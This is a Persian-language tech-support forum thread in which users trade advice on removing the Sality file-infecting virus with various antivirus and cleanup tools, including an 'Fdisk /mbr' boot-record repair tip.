C:\WINDOWS\system32\drivers\gsiknk.sys
و نوعش رو Rootkit تشخیص میده و اسمشو هم Win32:Rootkit-gen [Rtk] تشخیص میده .
نمیتونه آواست رو از کار بندازه . البته آواست من 4.8 هستش و همیشه هم آپدیت .
در هنگام اتصال به اینترنت هم هر چند دقیقه آواست از تمپ ویندوز فایل exe شناسایی میکنه و پاک میکنه .
کاسپر رو در عرض 3 ثاتیه از کار میندازه .
در آخر هم که ویندوز رو عوض کردم . :دی

اين ويروس منو داغون كرد ايشاللاه نويسندش رو خودم ببينم!
من با نود 32 تقريباً 4 ماه پيش يه ويندوز ريختم هنوز درايورارو نصب نكردده نود رو نصب كردم با يه اسكن مشتي دخل همشون اومد

اين برنامه جديد رو هم امتحان كنين :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

اين برنامه جديد رو هم امتحان كنين :


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

دوست عزیز این که جدید نیست !!فکر کنم در صفحات قبل معرفی شد و بحث شد که واسه شرکت AVG هست. من ازش جواب نگرفتم-اینم بگم قابلیت آنتی ویروس ترند در مقابله این ویروس این هست که فایل شمارو صحیح بهت پس میده وگرنهAVG , NOD 32 و .... هم براحتی ویروس رو شناسایی میکنند و اونارو delete میکنه اما فایلexe شما هم دیگه اجرا نمیشه

شرمنده ديگه حوصله نداشتم تمام اين تاپيكو بخونم .

عزیزان من دیروز به این ویروس مزخرف:2:دچار شدم وبا این برنامه ویندوزمو کاملا از شر این ویروس مزاحم راحت کردم به شما هم توصیه می کنم امتحان کنید



برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

حالا کسی میدونه چه جوری فایلهای exe ای رو که این ویروس داخلشون کد تزریق کرده رو تشخیص داد و پاک کرد ؟
چون بعد از پتک کردن ویروس اگه بخای رو یکی از این فایل exe ها کلیک کنی ، ویروسه باز فعال میشه و باز روز از نو و روزی از نو ....

حالا کسی میدونه چه جوری فایلهای exe ای رو که این ویروس داخلشون کد تزریق کرده رو تشخیص داد و پاک کرد ؟
چون بعد از پتک کردن ویروس اگه بخای رو یکی از این فایل exe ها کلیک کنی ، ویروسه باز فعال میشه و باز روز از نو و روزی از نو ....

سلام

بنظره شا چرا این تاپیک ایجاد شده!!!

جوابه سواله شما در پسته 1 هست.

موفق باشید.

سلام

بنظره شا چرا این تاپیک ایجاد شده!!!

جوابه سواله شما در پسته 1 هست.

موفق باشید.

دوست عزیز اولاً ممنون از زحماتی که واسه این تایپیک کشیده اید !!!
دوماً من که نگفتم چجوری باید پاکشون کرد !! اگه اینو میخواستم خودم میتونم درایو رو فرمتش کنم ، خلاص .
میخام بدونم چجوری میشه تشخیصشون داد .
باز هم متشکر بابت زحماتتون

حالا کسی میدونه چه جوری فایلهای exe ای رو که این ویروس داخلشون کد تزریق کرده رو تشخیص داد و پاک کرد ؟
چون بعد از پتک کردن ویروس اگه بخای رو یکی از این فایل exe ها کلیک کنی ، ویروسه باز فعال میشه و باز روز از نو و روزی از نو ....


دوماً من که نگفتم چجوری باید پاکشون کرد ->
حالا کسی میدونه چه جوری فایلهای exe ای رو که این ویروس داخلشون کد تزریق کرده رو تشخیص داد و پاک کرد ؟


اینو میخواستم خودم میتونم درایو رو فرمتش کنم ، خلاص پس نیازی به این تاپیک نبود!!



میخام بدونم چجوری میشه تشخیصشون داد . الان همه آنتی ویروسها تشخیصش میدن.

میتونید یه انتیه نسخه آزمایشی بنصبید اون براتون پیداشون میکنه اما پاکشون نمیکنه!!!

حجم فایلهای اجرایی شما به اندازه 56 کیلو اضافه میشن.

موفق باشید.

حجم فایلهای اجرایی شما به اندازه 56 کیلو اضافه میشن.
باز هم تشکر میکنم از زحماتتون .
ولی این حجمی که میگید واسه فایلهای اجرایی من اتفاق نیافتاده . چون همه نرم افزارهامو تو اون یکی هاردم بک داشتم و با فایلهای آلوده مقایسه کردم . ولی هیچ افزایش حجمی ندیدم .

باز هم تشکر میکنم از زحماتتون .
ولی این حجمی که میگید واسه فایلهای اجرایی من اتفاق نیافتاده . چون همه نرم افزارهامو تو اون یکی هاردم بک داشتم و با فایلهای آلوده مقایسه کردم . ولی هیچ افزایش حجمی ندیدم .

سلام

پس چه خوب شما آلوده نیستید.

موفق باشید.

من نمیتونم فایل
spywarepattern رو دانلود کنم

من نمیتونم فایل
spywarepattern رو دانلود کنم

سلام

شما برای سالیتی نیاز به این پترن ندارید!!!

اگه توضیحاته پست 1 را کامل میخوندید نوشته بودم چطور دون کنید.

اینم مسیرش برای امروز

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
موفق باشید.:31:

اقا من تمام مراحل رو انجام دادم و ظاهرا هم ویروس پاک شده بود . اما restart که کردم دوباره به حالت قبل بازگشت و هنوز هم کسپر اجرا نمیشه !!!!

خسته نباشی picher_s جان این لینک ها برای من باز نمیشن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
توضیح پایین هم متوجه نمیشم

خسته نباشی picher_s جان این لینک ها برای من باز نمیشن

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
توضیح پایین هم متوجه نمیشم
SysClean-PE_SALITY رو دانلود کردم
این ارورو میده
virus found : pe_sality
please reboot your system after sysclean finish scaning and cleaning your system

سلام

ممنون رفیق.

الان تست کردم باز شد.

شما اول اونی که ماله کسپر هست رو اجرا کن بعد، دوباره اینو اجرا کن.

چون ویروس رو نتونسته از تو حافظه بیرون بندازه میگه ریست کن تا دوباره تلاشمو کنم.:31:

موفق باشید.

من از تاپیک چیز زیادی دست گیرم نشد،
من هی پست میزنم هی من این ور اون ور میندازن،
"سلام علیکم
این ویروس ما همه فایلای exe رو خراب میکنه تازه سلیقه ای هم کار میکنه، مثلا به فایل برنامه ها مثل nero کاری نداره ولی torrento پاک میکنه و الان NOD32 AntiVirus 3.0.621 Final نصب کردم نمذاره اجرا بشه و خرابش کرده
چه بش کنم؟ "


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

من از تاپیک چیز زیادی دست گیرم نشد،
من هی پست میزنم هی من این ور اون ور میندازن،
"سلام علیکم
این ویروس ما همه فایلای exe رو خراب میکنه تازه سلیقه ای هم کار میکنه، مثلا به فایل برنامه ها مثل nero کاری نداره ولی torrento پاک میکنه و الان NOD32 AntiVirus 3.0.621 Final نصب کردم نمذاره اجرا بشه و خرابش کرده
چه بش کنم؟ "


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام

منظور استفاده از روشه پسته اوله تاپیکه!

شما یک بار تاپیک زدید و اونجا هم گفتم برید به این تاپیک.

موفق باشید.

سلام

منظور استفاده از روشه پسته اوله تاپیکه!

شما یک بار تاپیک زدید و اونجا هم گفتم برید به این تاپیک.

موفق باشید.


همون دیگه خوندم چیزی متوجه نشدم

ta delet bekhad in viros mano aziat karde... alan daram chiziro ke gofty dl mikonam omidvaram j bede chon in virose semej harchi va mikonam mibande ...

همون دیگه خوندم چیزی متوجه نشدم

سلام

پس ترجمه میکنم به زیان ATCOMMAND!:31:
به مسیرهای زیر رفته و فایلها را دونلود کرده سپس Extract کنید.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

که نگارش امروز lpt371.zip ([ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]) می باشد.
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

همراه اول جان ببین اینا رو دون کن. با این روش ی انتی ویروس بدون نصب میسازی که میتونه برات خیلی کار انجام بده.

حالا برو به پسته 1!

با سلام و اجازه
من با مکافی انترپرایز 8.5 و آپدیت Sdat 5722 همه فایلای آلوده رو به راحتی کلین کردم.
امیدوارم به کار شما هم بیاد.

سلام. اموزش از بین بردن ویروس سالیتی رو و ویروس مثل این رو توضیح دهید و ایا انتی ویروسی برای این ویروس سلیتی است ............استاد ممنون میشوم اموزش کامل از بین بردن این ویروس را بگویید.sality

سلام. اموزش از بین بردن ویروس سالیتی رو و ویروس مثل این رو توضیح دهید و ایا انتی ویروسی برای این ویروس سلیتی است ............استاد ممنون میشوم اموزش کامل از بین بردن این ویروس را بگویید.sality

شما کافیست برنامه کوچیک زیر رو دانلود و اجرا کنید

تمام فایل های مبتلا شده به این ویروس رو براتون پاک میکنه البته خود فایل ها رو از بین نمی بره


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام
همه چیز خوب بود تازه هم آپدیت کرده بودم که متوجه شدم قسمت فایروالم مشکل پیدا کرده!
پیغام زیر در قسمت فایروال نشون داده شده:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
no filtering mode defined, the personal firewall is malfunctioning. a computer restart may be requaid
اما ری استارتم می کنم درست نمی شه

مجبور شدم یکبار دیگه نصبش کنم، با اینکار موقتا این مشکل حل شده یود تا اینکه بازم امروز
دوباره اینجوری شد!!!!!!!!:41:
در ضمن فایروال روی حالت interactive هستش، همه حالتا هم انتخاب کردم اما فرقی نمی کنههههههههههههههه!

راستی یه چیز دیگه این ناد32 داره کم کم، تک تک برنامه ها رو قرنظینه میکنه هی مینویسه فلانی رو خف کردم، فلانی مشکل ویروس داره!!
هر روزم آپدیتش می کنم.:8:



ممكنه سيستم شما مشكل آلودگي به انواع ويروسها را داشته باشه.تصويري از پيغامهايي كه NOD32 اعلام ميكنه قرار بديد تا با هم كنترل كنيم.

این عکسی که بالا گذاشتم همونه دیگه! پیغام دیگه ای نمی ده! چیز خاصی نمی گه!!!!!:41:


تصویر پیغام قرنطینه رو ندارم اما یه بالون زورد معمولی اون پایین میومد که میگف مثلا image ready.exe آلوده به ویروس Salary شده و در نتیجه قرنطینه!!!!!!!!!!!
2- نسخه 4 bussiness edition
3- فایروال با برنامه امنییتی دیگری ندارم، فایروال ویندوز هم خاموشه.gif



ظاهرا ويندوز شما آلوده به ويروس Salitary شده كه ابتدا بايد آنرا از بين ببريد(ميتونيد در انجمن اورژانس سيستمهاي آلوده مطرح كنيد).بعد از
پاكسازي اين ويروس ببينيد آيا مشكل شما از بين ميره يا خير.شايد مربوط به اين ويروس باشه.


-----------------------------------------------------------------------------------------------
----------------------------------------------------------------------------------------------
--------------------------------------------------------------------------------------------
شما گفتید ویروس sality دارم، که صد البته دارم:21:
منم طبق پست اول رفتم اونا رو دانلود کردم و مو به مو اجرا کردم.
اول بزارید تصویر پیغام ناد32 در مورد sality رو ببینید:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

بعدش برنامه ای گفتین رو دانلود کردم و کارهاش رو انجام دادم، در نهایت همونطور که گفتین fix.bat رو
اجرا کردم ولی این پیغام رو داد:31:
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

حتی رفتم توی لینکی که از کاسپراسکی گذاشته بودید، اونم دانلود کردم ولی:13:این نتیجه اسکن هاردم!
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
خوب دکتر، حالا شما چی تجویز می کنید؟
راستی بگن ناد32 من همین امروز آپدیت شده، دوستان نفرمایند که برید و آنتی ویروس بروز بگیرید!

شما کافیست برنامه کوچیک زیر رو دانلود و اجرا کنید

تمام فایل های مبتلا شده به این ویروس رو براتون پاک میکنه البته خود فایل ها رو از بین نمی بره


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

من این هم دانلود کردم، بعد از چند ثانیه ثانیه اسکن، پینجرش بسته میشه:18:
یعنی یه جوایی، هیچ کاری نم یکنه!

به نظر میاد من با یه پدیده جدید و عجیب مواجهه شده باشم!:31:

من این هم دانلود کردم، بعد از چند ثانیه ثانیه اسکن، پینجرش بسته میشه:18:
یعنی یه جوایی، هیچ کاری نم یکنه!

به نظر میاد من با یه پدیده جدید و عجیب مواجهه شده باشم!:31:

با این یکی تست کن ببین جواب میده یا نه


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

با این یکی تست کن ببین جواب میده یا نه


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

سلام داش وحید :10:
این یکی هم گرفتم، تا لحظه نگارش این پست فعلا که داره اسکن می کنه!
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
منتظرم تموم شه ببینم چی میشه!:31:

در ضمن یه نکته ای خدمت مدیرات محترم پی سی ورلد عرض کنم که باعث سو تفاهم نشه یوقت:11:
این عکسایی که من میزارم، همشونو توی فتوشاپ به شدت کم حجم می کنم تا صفحات سایت سنگین نشن
خودم می دونم نباید زیاد از عکس استفاده کنم اما گاهی لازمه! خلاصه خواستم بگم یوقت از دست من شاکی نشین :40::40::40::40::40::40::40::40:

کسی نبود جواب بده؟ Picher_s جان کجایی؟
پست شماره 138 رو دیدی؟ صفحه قبلو می گماااااااا

کسی نبود جواب بده؟ Picher_s جان کجایی؟
پست شماره 138 رو دیدی؟ صفحه قبلو می گماااااااا

ُسلام
نود را پاک کنید.
و پست 1 رو انجام بدید.

دلیله اون خطایه FIX اینه که پایگاهش رو دون نکردی!!!

بعد از اتمام clean شما کسپر بنصبید.

موفق باشید.

ُسلام
نود را پاک کنید.
و پست 1 رو انجام بدید.

دلیله اون خطایه FIX اینه که پایگاهش رو دون نکردی!!!

بعد از اتمام clean شما کسپر بنصبید.

موفق باشید.


من تموم بندهای پست یک رو مو به مو اجرا کردم!
سه تا لینک دادید که همشو دانلود کردم
این دیتابیس باید کجا باشه؟
حتما دانلود کردم، شاید درست جای خودش کپی نکردم! شاید:41::41:
ببینم گفتی lptNUM رو یریزم system\sysclean بعدشم
فایل ssaptn.849 رو کجا باید بریزم؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

در شمن مگه ناد چشه؟ رینستال کردم، الانم آخرین آپدیتشو دارم
راستش کاسپر خسلی سنگین میکنه:18: اشک سیستم در میاد.
فقط ناد:10:

من تموم بندهای پست یک رو مو به مو اجرا کردم!
سه تا لینک دادید که همشو دانلود کردم
این دیتابیس باید کجا باشه؟
حتما دانلود کردم، شاید درست جای خودش کپی نکردم! شاید:41::41:
ببینم گفتی lptNUM رو یریزم system\sysclean بعدشم
فایل ssaptn.849 رو کجا باید بریزم؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟؟

در شمن مگه ناد چشه؟ رینستال کردم، الانم آخرین آپدیتشو دارم
راستش کاسپر خسلی سنگین میکنه:18: اشک سیستم در میاد.
فقط ناد:10:

نود نمیتونه این ویروس رو پاک سازی کنه.

در همون پوشه بریزشون.

موفق باشید.

نود نمیتونه این ویروس رو پاک سازی کنه.

در همون پوشه بریزشون.

موفق باشید.

من این ویروسو یه هفته پیش گرفتم و راحت با نود ورژن 4 پاکش کردم الانم هیچ مشکلی نداره
حدود 4 ساعت هم طول کشید

من این ویروسو یه هفته پیش گرفتم و راحت با نود ورژن 4 پاکش کردم الانم هیچ مشکلی نداره
حدود 4 ساعت هم طول کشید

نه قبل از اینکه نودتون رو از کار بندازه.

نود نمیتونه این ویروس رو پاک سازی کنه.

در همون پوشه بریزشون.

موفق باشید.


ریختم نشد!:13:
بهر حال فکر کنم نصب دوباره ویندوز تیر خلاص باشه!
من دوباره می نصبم و نتیجه رو می گم. بهر حال مرسی picher جان تنکس:10:

ریختم نشد!:13:
بهر حال فکر کنم نصب دوباره ویندوز تیر خلاص باشه!
من دوباره می نصبم و نتیجه رو می گم. بهر حال مرسی picher جان تنکس:10:
گزارش من بعد از نصب ویندوز!:31:
بعد از نصب ویندوز در یک اقدام تارومار کننده و خفـــــــــــــــــــن در اولین ثانیه ها بوسیله هرچی آنتی ویروس و ضد سالیتی دانلود کردم افتادم بجون این 500 گیگ هاردم و حسابی تکوندمش! اینم عکسه شه:31::31:
در تصویر زیر کامپیوتر من در حال پاکسازی یه!
[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]

در ضمن اون آنتی ویروسی که گذاشته بودید پست اول و برای من اجرا نمی شد،
بعد از نصب ویندوز اجرا شد و مثل چی کار کرد،
فعلا به نظر می رسه سالیتی در کار نباشه:46:

امروز 13 آبانه!
از صبح که اومدم یاهو مسنجرم باز نمی شه!!!!
نمی دونم از اثراته ویروسه که باقی مونده یااااااااااااااا!
ببینم کسی امروز با یاهو مسنجر مشکل پیدا نکرده؟

امروز 13 آبانه!
از صبح که اومدم یاهو مسنجرم باز نمی شه!!!!
نمی دونم از اثراته ویروسه که باقی مونده یااااااااااااااا!
ببینم کسی امروز با یاهو مسنجر مشکل پیدا نکرده؟

نه بخاطره روزه دانش آموزه!!:31::46:

نه بخاطره روزه دانش آموزه!!:31::46:
بله متوجه شدم!
این شیوه جدیده!
لعنت بر...........
دوستانی که با یاهو مسنجر مشکل دارن به لینک زیر برن، حل میشه:31:

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
به پست 1640# توجه کنید:11:

آقا این ویروس یه نسخه جدید داده تا ویندوز عوض میکنم بر میگرده سعی میکنه به اینترنت وصل شه (ASDL)

دقت کنید من هیچ کاری نمیکنم... تاکید میکنم هیییییچ کاری.. اما با دومین ری استارت بر میگرده. فقط دارم درایور هامو نصب میکنم بدون باز کردن هارد یا فایل EXE از رو هارد. سی دی مین در نیومده بر میگرده. از ویندوز هم نیست .

آقا این ویروس یه نسخه جدید داده تا ویندوز عوض میکنم بر میگرده سعی میکنه به اینترنت وصل شه (ASDL)

دقت کنید من هیچ کاری نمیکنم... تاکید میکنم هیییییچ کاری.. اما با دومین ری استارت بر میگرده. فقط دارم درایور هامو نصب میکنم بدون باز کردن هارد یا فایل EXE از رو هارد. سی دی مین در نیومده بر میگرده. از ویندوز هم نیست .

خوب شما پس قبل از درایورا انتی بنصب اونم کسپر رو.

من قبل این 2 تا پست مفصل نوشتم هر دو بخاطر این لامصب که سرعت نت رو میکشه پرید!!!

کسپر رو خدا خیریش بده EXE هامو کلین کرد اما الان پاندا دارم. الان هم داره اسکن میکنه. کسپر اسکن مموریش راه نمی افتاد که کار ویروس بود. الان هم پاندا داره اسکن میکنه. کسپر که نتونست خود ویروس رو پیدا کنه در ضمن اینکه یه فایل دارم که کسپر آپدیت شده هم نشون نمیده اما تو یه سایت آپ کردم Virus buster گفت سالیتی هست بقیه هیچی پیدا نکردند. تو ساب درایوم هم هیچی نیست هنوز هیچ درایوی رو دابل کلیک نکردم اما با run که میرم هیچی توش نیست که مشکوک باشه. به نظر شما سیستم پروتکشن باید خاموش باشه یا فرقی نداره؟

سلام

همیشه باید روشن باشه.

کسپرت رو به روز کن.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

موفق باشید.

درود;

به روزه داداش از خوده سایتش آپدیت کردم ورژنش هم 2009 هست...

فکر میکنم لامصب رو پیدا کردم یه فایل به نام grvns تو یکی از درایوام (G) خودشو با یه فایل دیگه بنام BOOTMGR همراه کرده بود. ویندوز که عوض میکردم خودشو پارتیشن بوت میکرد و از اونجا لود میشد. پاکم میشد بر میگشت. با یه CD BOOT اومدم بالا پاکش کردم ویندوز عوض کردم فعلا که مشکل ندارم. فایله رو واسه لابراتوآر کاسپر دارم می فرستم. اگه برگرده دیگه میرم تو کار پارتیشن بندی...

درود;

به روزه داداش از خوده سایتش آپدیت کردم ورژنش هم 2009 هست...

فکر میکنم لامصب رو پیدا کردم یه فایل به نام grvns تو یکی از درایوام (G) خودشو با یه فایل دیگه بنام BOOTMGR همراه کرده بود. ویندوز که عوض میکردم خودشو پارتیشن بوت میکرد و از اونجا لود میشد. پاکم میشد بر میگشت. با یه CD BOOT اومدم بالا پاکش کردم ویندوز عوض کردم فعلا که مشکل ندارم. فایله رو واسه لابراتوآر کاسپر دارم می فرستم. اگه برگرده دیگه میرم تو کار پارتیشن بندی...

درود

نیاز نیست پارتیششن بندی کنی!!!

من که فکر نمیکنم تو Boot Sectorت نشسته باشه! آخه دستی پاکش کردی.

تمامه BootSector ا هم با دستوره Fdisk /mbr از بین می رن.

موفق باشید.

درود

نیاز نیست پارتیششن بندی کنی!!!

من که فکر نمیکنم تو Boot Sectorت نشسته باشه! آخه دستی پاکش کردی.

تمامه BootSector ا هم با دستوره Fdisk /mbr از بین می رن.

موفق باشید.


با هایرن بوت پاکش کردم همینجوری پاکش نکردم که. در ضمن تو یه درایو دیگم خودشو نشونده بود. چون من دو تا هارد دارم پارتیشن اول اونو D میکرد و درایو بوت.... با این دستور اطلاعاتم تغییری نمیکنه؟ فقط بوت سکتور رو ریست میکنه؟ فایلهای بوت سکتور تو محیط ویندوز قابل دیدن هستند؟

در ضمن هنوز ویندوزم اتومات به اینترنت وصل میشه اما ویروسی ندارم به نظر شما مشکل از کجاست؟

متشکر...

نه قابل دیدن نیستن .

میتونی با بوته کسپر خیلی چیزا رو ببینی D:

درسته هیج فایلیت پاک نخواهد شد.


در ضمن هنوز ویندوزم اتومات به اینترنت وصل میشه اما ویروسی ندارم به نظر شما مشکل از کجاست؟

یه آنتی SpyWAre بریز براش.

الان من دارم از Cloud Antivirus Panda استفاده می کنم.

برای کاربران همیشه online داره به من جواب میده.

موفق باشید.

درود;

عزیز این دستور رو شما تو چی میدین(Fdisk)؟ تو cmd که نمیشه تو بوت چندتا ویندوز هم دادم مثل اینکه این دستور توشون نبود؟ شما با چه برنامه ای وارد میکنین؟

این بوت کاسپر رو هم که گفته بودین تو سایتشون گشتم چیزی پیدا نکردم. با فورمت درایو این بوت سکتور از بین میره؟ کلا نرم افزاری هست که اینو چک کنه وبعد به حالت اولیه برگردونه؟ با Avira چک کردم چیزی پیدا نکرد اما مطمئنم کار ویندوز نیست.

متشکر...

درود بر تو رفیق.

ببین چون ویروست بوت سکتوری نیست!

من که گفتم ویروست بوت سکتوری نیست!!!

اینم بوت کسپر


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

موفق باشی.

با اجراي sality_of مينويسه ويروس win32.sality.y.aa است.

[ برای مشاهده لینک ، لطفا با نام کاربری خود وارد شوید یا ثبت نام کنید ]
درسته؟ همون ويروسه؟
چه جوري پاكش كنم كه فايل هاي آلوده روي سيستمم پاك نشن؟

درود;

آقا ممنون بابت لینک ,جواب این سوالهامو میدی؟:


عزیز این دستور رو شما تو چی میدین(Fdisk)؟ تو cmd که نمیشه تو بوت چندتا ویندوز هم دادم مثل اینکه این دستور توشون نبود؟ شما با چه برنامه ای وارد میکنین؟
با فورمت درایو این بوت سکتور از بین میره؟ حتی کوئیک فرمت یا حتما باید سوئیچ S داشته باشه؟

متشکر...

درسته؟ همون ويروسه؟
چه جوري پاكش كنم كه فايل هاي آلوده روي سيستمم پاك نشن؟

آره خوده ناکسشه. تو همون پست اول نوشتم که!



عزیز این دستور رو شما تو چی میدین(Fdisk)؟ تو cmd که نمیشه تو بوت چندتا ویندوز هم دادم مثل اینکه این دستور توشون نبود؟ شما با چه برنامه ای وارد میکنین؟
با فورمت درایو این بوت سکتور از بین میره؟ حتی کوئیک فرمت یا حتما باید سوئیچ S داشته باشه؟

اگه یه CD بوته داس داشته باشی دستورات داس توشن.

همونایی رو می گم که فرمت و ... توشونه!

حالا این دستور رو بنویس Fdisk /mbr این برات mbr رو Update میکنه.


Fdisk has an undocumented parameter called /mbr that causes it to write the master boot record to the hard disk without altering the partition table information.

Warning Writing the master boot record to the hard disk in this manner can make certain hard disks partitioned with SpeedStor unusable. It can also cause problems for some dual-boot programs and disks with more than four partitions.


برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

نه نیاز به سویچ S نداری! تو همون توضیحات نوشته که باید این دستور(Fdisk /mbr) رو استفاده کنی.

پولدار باشی.

درود;

آخه عزیزه جان داس که SATA ساپورت نمیکنه!!! این دستور رو من کجا وارد کنم هی میگید! اون پیج رو هم خونده ام. اما توش نگفته بود که با فرمت بوت سکتور هم به حالت اول بر میگردی یا نه؟ خوب.. میرم بگردم.. از اطلاعاتتون متشکر...

.......

مطالب مفیدی بود. استفاده کردیم.

دروود به دوستان
این ویروس سیستم من هست:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
تا اونجایی که من فهمیدم این کارا رو روی سیستم من انجام داده!
task manager غیر فعال
گزینه run از منوی استارت رفته
اجازه نصب انتی ویروس نمیده
فکر کنم از این مدل های exe یا dll هست
هر پوشه ای باز میکنم میره داخل پوشه
کاری به show hiden file و ... نداشته اصلا
اسم درایو c رو به music تغییر داده
حجم ویروس 184 کیلو بایت هست
بالای قسمت ابی دراو ها یا صفحات اکسپلویر و بعضی برنامه ها هم music نوشته شده
دوستان گرامی لطفا راهی برای رهایی از این ویروس معرفی کنید

دروود به دوستان
این ویروس سیستم من هست:
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
تا اونجایی که من فهمیدم این کارا رو روی سیستم من انجام داده!
task manager غیر فعال
گزینه run از منوی استارت رفته
اجازه نصب انتی ویروس نمیده
فکر کنم از این مدل های exe یا dll هست
هر پوشه ای باز میکنم میره داخل پوشه
کاری به show hiden file و ... نداشته اصلا
اسم درایو c رو به music تغییر داده
حجم ویروس 184 کیلو بایت هست
بالای قسمت ابی دراو ها یا صفحات اکسپلویر و بعضی برنامه ها هم music نوشته شده
دوستان گرامی لطفا راهی برای رهایی از این ویروس معرفی کنید

سلام

براش یه تاپیک جدابزن.

ايا راهي براي ريپير كردن فايل هاي آلوده به اين ويروس است؟!!
فايل هاي setup‌كلي زحمت دانلودشون كشيده بودم به اين ويروس مخوف مبتلا شدند
نود32 اين ويروس رو شناسايي مي كنه اما تنها راه حذف فايل exe‌است.
يك نفر به من كمك كنه من نمي خواهم فايلهاي Exe‌ام را از دست بدم؟!!
:27::19::27:

ايا راهي براي ريپير كردن فايل هاي آلوده به اين ويروس است؟!!
فايل هاي setup‌كلي زحمت دانلودشون كشيده بودم به اين ويروس مخوف مبتلا شدند
نود32 اين ويروس رو شناسايي مي كنه اما تنها راه حذف فايل exe‌است.
يك نفر به من كمك كنه من نمي خواهم فايلهاي Exe‌ام را از دست بدم؟!!
:27::19::27:

سلام

دوست عزیز پس آخره پست یک من چی توضیح دادم؟!!!:41::19:

در بعضي از وبلاگها ديده بودم Avira‌قابليت ريپير فايل آلوده به اين ويروس را دارد هنگامي كه repair را زدم همه فايلهام رو يكجا پاك كرده
:19::41::19:

دوست عزیز پس آخره پست یک من چی توضیح دادم؟!!
بهتر بود اين مطلب رو در پستت درشت مي كردي چون نكته بسيار مهمي است!

چه كار كنم تا ساليتي كيلر فلشم رو اسكن كنه!
برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید
اين يعني چي !

اويرا بدترينه تو اين زمينه!!:41:

عزيز قبل از اجرا وصلش كن.

ميتوني از SYS_CLean‌ترند ماكرو استفاده كني.


بهتر بود اين مطلب رو در پستت درشت مي كردي چون نكته بسيار مهمي است!

چشم انجام شد.

موفق باشيد.

sality killerحرف ندارد اما sysclean يك مقدار حجمش زياده 40MB !

sality killerحرف ندارد اما sysclean يك مقدار حجمش زياده 40MB !

اين ديگه دسته خودته.

اگه يك ماهه پيشم ميگرفتي ساليتي كيلي نبود بجاش ساليتي اف بود.:5:

در ضمن براي اسكن فلي ها ميتوني از سويچ هاش هم استفاده كني.

-p <folder_path> – scan a specific folder.
-r - scan removable drives, portable hard disks connected via USB and Fire Wire.
-r - scan removable media.
-n - scan flash data storage devices.
موفق باشي.

بدون ویندوز عوض کردن میشه این ویروس رو پاک کرد؟؟

بدون ویندوز عوض کردن میشه این ویروس رو پاک کرد؟؟

تو پست اول آخرش نوشته شده.

بدون ویندوز عوض کردن میشه این ویروس رو پاک کرد؟؟

خوش اومدي به اين فروم.

تو پست 1 آخرش Sality Off , sality Killer ‌رو دون و اجرا كن.:31:

موفق باشيد.:19:

سلام جناب picher_s :
مشکل من اینه که ویروس اجازه دسترسی به وب سایت های ویروس کش مثل trend رو نمیده که بتونم فایلهای پست یک شما رو دانلود کنم..
راهی داره ؟

خوش اومدی رفیق.

ببین نیاز نیست اونا رو دون کنی!!! شما اون Sality Off و Sality killer رو دون کن.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

بعدش هم MSH_Kill رو اجرا کن تا ترمیم کنه همه چی رو.

برای مشاهده محتوا ، لطفا وارد شوید یا ثبت نام کنید

موفق باشید.

با سلام
من ویروس win32/chir.b.worm و sality همزمان به هم روزگارم رو سیاه کردند با آنتی ویروس avira و nod و روشهایی که در تاپیک آمده میشه گفت ویروس رو پاک کردم ولی خیلی از فایلهای exe حذف شدند آیا میشه با نرم افزارهای ریکاوری اونها رو برگردوند یا نه در مورد این ویروس win32/chir.b.worm مثل اینکه اسم دیگش nimda هم کمک کنید ممنون میشم

من این روش کوتاه رو امتحان کردم. اما سیستم آلوده نبود. مشکل فلشمه. کسپر وقتی اسکن میکنه اطلاع میده که فلش آلوده به سلیتی هستش. اما این راهی که شما گفتید همه درایوهای من رو اسکن کرد اما فلش رو نه.
البته مشکل write protected هم که سرجای خودشه..

با سلام
چی شد خبری نیست سوال مارو کسی جواب نمی ده
راستی فایلهای ویروسی شده با sality را اگر در لینکوس منتقل کنیم آیا خودش رو بر روی درایوهای ویندوز هم کپی میکند

من این روش کوتاه رو امتحان کردم. اما سیستم آلوده نبود. مشکل فلشمه. کسپر وقتی اسکن میکنه اطلاع میده که فلش آلوده به سلیتی هستش. اما این راهی که شما گفتید همه درایوهای من رو اسکن کرد اما فلش رو نه.
البته مشکل write protected هم که سرجای خودشه..

